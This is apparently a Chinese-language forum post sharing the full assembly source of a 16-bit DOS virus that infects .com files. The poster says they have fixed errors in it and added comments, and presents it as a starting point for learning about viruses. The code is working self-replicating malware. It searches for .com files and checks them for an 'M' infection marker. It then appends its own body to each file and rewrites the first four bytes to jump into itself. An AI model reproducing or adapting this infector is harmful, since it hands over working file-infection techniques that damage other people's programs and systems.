原来有一些错误，改正过来了，另外自己加了一些注解。毕竟实dos年代的16位病毒了，现在作用不大，但是似乎可以被杀毒软件检测出来，呵呵。         如果想学习病毒，不妨从这个开始，里面我自己加了些注解，如果不是很清除，可以和我交流。 VirusLength equ VirusEnd-VirusStartcode segment  assume cs:code,ds:code,ss:code  org 100hmain proc near  InfectedCode db 'M'               db 3 dup(90h)VirusStart:  call WhereIAmWhereIAm:  pop si  mov bp,si  add si,Original4Bytes-WhereIAm  mov di,100h  movsw  movsw;Change the first 4 bytes.  mov si,bp  mov ah,4ehLooK4NextTarget:  mov dx,offset Target-WhereIAm  add dx,si  mov cx,0  int 21h;Search for the first target file(*.com)  jc error  mov ax,3d02h  mov dx,9eh  int 21h  jc error  xchg ax,bx  mov ah,3fh  mov dx,si  add dx,Original4Bytes-WhereIAm  mov cx,4  int 21h;Read first 4 bytes of the finded file and stock in Original4Byetes  mov al,'M'  cmp ds:[si+Original4Bytes-WhereIAm],al  jz SickOrExe;Check if a infected file or exe file.  mov ax,4202h  xor cx,cx  xor dx,dx  int 21h;Move to the end of the file.  mov di,offset FourNewBytes-WhereIAm  add di,2  add di,si  sub ax,4  mov ds:[di],ax;Finish the backward two bytes in the FourNewBytes.;Now the 4 bytes means:;  dec bp;  jmp xx(jmp to the end of the file(virus start now!).)  add si,VirusStart-WhereIAm  mov ah,40h  mov dx,si  mov cx,VirusLength  int 21h;Copy the virus to the end of the file.  mov si,bp  jc error  mov ax,4200h  xor cx,cx  xor dx,dx  int 21h;Move to the head of the file.  mov ah,40h  mov cx,4  mov dx,si  add dx,offset FourNewBytes-WhereIAm  int 21h;Fill the first 4 byte of FourNewBytes.  jc error  mov ah,3eh  int 21h;Finished infecting,shut the file.SickOrExe:  mov ah,4fh  jmp Look4NextTargeterror:  mov ax,100h  push ax  retmain endpOriginal4Bytes:  ret;The 'ret' here means if haven't find any proper file,then ret.  db 3 dup(?)  Target db '*.com',0  FourNewBytes db 'M',0e9h,0,0  VirusEnd equ $code ends  end main

评论